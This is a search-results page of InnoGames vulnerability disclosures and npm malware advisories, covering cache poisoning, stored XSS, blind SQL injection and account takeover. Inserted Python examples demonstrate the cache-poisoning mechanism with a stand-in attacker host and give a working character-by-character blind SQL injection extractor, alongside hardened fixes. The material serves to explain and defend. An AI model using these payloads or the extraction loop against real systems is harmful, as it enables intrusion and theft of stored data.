9 matches found
MAL-2025-23239 Malicious code in innogames (npm)
The package innogames was found to contain malicious code...
MAL-2022-2040 Malicious code in com.innogames.asset-relations-viewer-addressables (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 81ae03950b09c854e3888fb0f69bec9fab0b81bd98f06e7c522bff8dda778b03 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
InnoGames: Cache Poisoning via uppercase letters in invalid path
Summary of the issue: A cache poisoning vulnerability appears in requests to innogames.com. The issue arises when the language path parameter from the URL is processed on the backend and converted to lowercase. Then, if a path provided in X-Forwarded-Host does not exist on the server, a 301 response is...
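The mechanism the summary describes (case-sensitive cache key in front of an origin that lowercases the language segment and builds its redirect from X-Forwarded-Host) modelled in a few lines, as an added illustration that is not part of the report and not the real site's code. The host names, the routing table, the cache keying only on the raw path, and the hardened variant are all assumptions made for the example.

```python
"""Model of a shared cache in front of an origin that lowercases the language
path segment and builds 301 redirects from X-Forwarded-Host.
Constructed example: hosts, paths and behaviour are assumptions, not the real site."""

from dataclasses import dataclass, field
from typing import Callable, Dict

CANONICAL_HOST = "www.example.com"                        # assumed canonical host
KNOWN_PAGES = {"/en/", "/en/about", "/de/", "/de/about"}  # constructed routing table


@dataclass
class Request:
    path: str
    headers: Dict[str, str] = field(default_factory=dict)


@dataclass
class Response:
    status: int
    headers: Dict[str, str] = field(default_factory=dict)
    body: str = ""


def normalise(path: str) -> str:
    """Lowercase only the first (language) segment, as the summary says the backend does."""
    parts = path.split("/")
    if len(parts) > 1:
        parts[1] = parts[1].lower()
    return "/".join(parts)


def origin_vulnerable(req: Request) -> Response:
    # The redirect target is taken from X-Forwarded-Host, which any client can set.
    host = req.headers.get("X-Forwarded-Host") or req.headers.get("Host", CANONICAL_HOST)
    target = normalise(req.path)
    if target not in KNOWN_PAGES:
        return Response(301, {"Location": f"https://{host}/"})
    return Response(200, body=f"content for {target}")


def origin_hardened(req: Request) -> Response:
    # Same lowercasing, but the redirect host comes from configuration and the
    # redirect is marked uncacheable, so nothing client-supplied can be stored.
    target = normalise(req.path)
    if target not in KNOWN_PAGES:
        return Response(301, {"Location": f"https://{CANONICAL_HOST}/",
                              "Cache-Control": "no-store"})
    return Response(200, body=f"content for {target}")


class Cache:
    """Minimal shared cache keyed on the raw, case-sensitive path only. It never
    looks at X-Forwarded-Host, which is why the poisoned redirect is served to others."""

    def __init__(self, origin: Callable[[Request], Response]):
        self.origin = origin
        self.store: Dict[str, Response] = {}

    def get(self, req: Request) -> Response:
        key = req.path
        if key in self.store:
            return self.store[key]
        resp = self.origin(req)
        if "no-store" not in resp.headers.get("Cache-Control", ""):
            self.store[key] = resp
        return resp


def poison_and_replay(origin: Callable[[Request], Response]) -> str:
    """Attacker primes one cache slot, then a victim fetches the same URL.
    Returns the Location header the victim receives."""
    cache = Cache(origin)
    # Uppercase "EN" is a cache key no ordinary link uses, yet the origin still
    # lowercases it, finds nothing, and answers with a 301 the attacker shaped.
    attacker = Request("/EN/missing", {"Host": CANONICAL_HOST,
                                       "X-Forwarded-Host": "attacker.example"})
    cache.get(attacker)
    victim = Request("/EN/missing", {"Host": CANONICAL_HOST})
    return cache.get(victim).headers.get("Location", "")


if __name__ == "__main__":
    print("vulnerable:", poison_and_replay(origin_vulnerable))
    print("hardened:  ", poison_and_replay(origin_hardened))
```

The check a practitioner would run against a real deployment is the same shape: request a path variant that cannot already be cached (case or a unique query string), send an X-Forwarded-Host of your own, then re-request without the header and see whether the Location still carries your host.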
InnoGames: Stored XSS on recruit.innogames.de
Summary: When applying for a Supporter/Moderator job at recruit.innogames.de, the drop-down field "Position" is vulnerable to a stored XSS, as its content is not validated. Description: Steps To Reproduce: 1. Visit https://recruit.innogames.de/staemme/de/index/page/show/apply 2. Fill out all requir...
InnoGames: Impersonation and ticket id enumeration on support.innogames.com
A missing check for authorization made it possible to answer tickets owned by other users in their own name...
InnoGames: Create any military unit in any age
Summary of the Issue: It's possible to create a sniperbot unit in the Bronze Age by sending a crafted request to the xs1.forgeofempires.com/game/json endpoint. Steps to reproduce: 1. Log in to https://xs1.forgeofempires.com with the Chrome browser while observing the network tab. 2. Open the poc20200227.html F7304...
InnoGames: Blind SQL Injection
Summary of the Issue: A time-based blind SQL injection vulnerability was detected on www.innogames.com. Using a specifically crafted payload it was possible to extract database entries. Vulnerable endpoint: https://www.innogames.com/ Steps to reproduce: 1. Getting two states for boolean-based SQL...
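The "two states" step is the whole of a blind injection: once a request can be made to answer true or false, the database is read one character at a time. Below is an added, self-contained demonstration against an in-memory SQLite table, not the report's payload or the real endpoint; the table, the lookup function and the hypothetical "did any row match" behaviour are constructed for the example. It uses the boolean (row/no-row) oracle; a time-based variant swaps the oracle for a delay measurement and leaves the extraction loop unchanged.

```python
"""Boolean-based blind SQL injection against a constructed SQLite table,
with the parameterised fix beside it. Added example, not code from the report."""

import sqlite3
import string
from typing import Callable, Tuple


def make_db() -> sqlite3.Connection:
    # Constructed sample data; not taken from any real system.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, secret TEXT)")
    conn.executemany("INSERT INTO users (name, secret) VALUES (?, ?)",
                     [("alice", "s3cr3t"), ("bob", "hunter2")])
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, name: str) -> bool:
    # Hypothetical endpoint: concatenates input into SQL and reveals only whether
    # a row matched. That single bit is the "two states" a blind injection needs.
    sql = f"SELECT 1 FROM users WHERE name = '{name}'"
    return conn.execute(sql).fetchone() is not None


def lookup_hardened(conn: sqlite3.Connection, name: str) -> bool:
    # Same behaviour, but the input is bound as a parameter and never parsed as SQL.
    return conn.execute("SELECT 1 FROM users WHERE name = ?", (name,)).fetchone() is not None


def extract_secret(oracle: Callable[[str], bool], known_name: str, max_len: int = 16) -> str:
    """Ask the oracle one character at a time: name' AND SUBSTR(secret,pos,1)='c
    The trailing quote of the original query closes the injected literal."""
    charset = string.ascii_lowercase + string.digits
    out = ""
    for pos in range(1, max_len + 1):
        for ch in charset:
            payload = f"{known_name}' AND SUBSTR(secret,{pos},1)='{ch}"
            if oracle(payload):
                out += ch
                break
        else:
            break  # no candidate matched: past the end of the string
    return out


def demo() -> Tuple[str, str]:
    """Run the extraction against both lookups; returns (vulnerable, hardened) results."""
    conn = make_db()
    leaked = extract_secret(lambda p: lookup_vulnerable(conn, p), "alice")
    blocked = extract_secret(lambda p: lookup_hardened(conn, p), "alice")
    return leaked, blocked


if __name__ == "__main__":
    leaked, blocked = demo()
    print("vulnerable lookup leaked:", repr(leaked))
    print("hardened lookup leaked:  ", repr(blocked))
```

Against the hardened lookup every payload is compared as a literal name, so the first position already fails and nothing is recovered; that is the property to verify when retesting a fix, rather than only checking that one known payload no longer works.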
InnoGames: Chaining Bugs: Leakage of CSRF token which leads to Stored XSS and Account Takeover (xs1.tribalwars.cash)
The Referer leaked the CSRF code when opening an embedded PHP file set by the images function in tribe forums. Due to a premium function, which allows players to store and run JavaScript during the game, the session ID could be grabbed, as it was mistakenly embedded into the DOM. This...
InnoGames: Information disclosure via ".htaccess" at https://login.innogames.de
Hi team, I found an insecure file. Name: .htaccess. Normally, only the web server is allowed to read the .htaccess file, but in this case it appears that there is a misconfiguration that is causing the contents of the .htaccess located at https://login.innogames.de/.htaccess to be downloadable and read...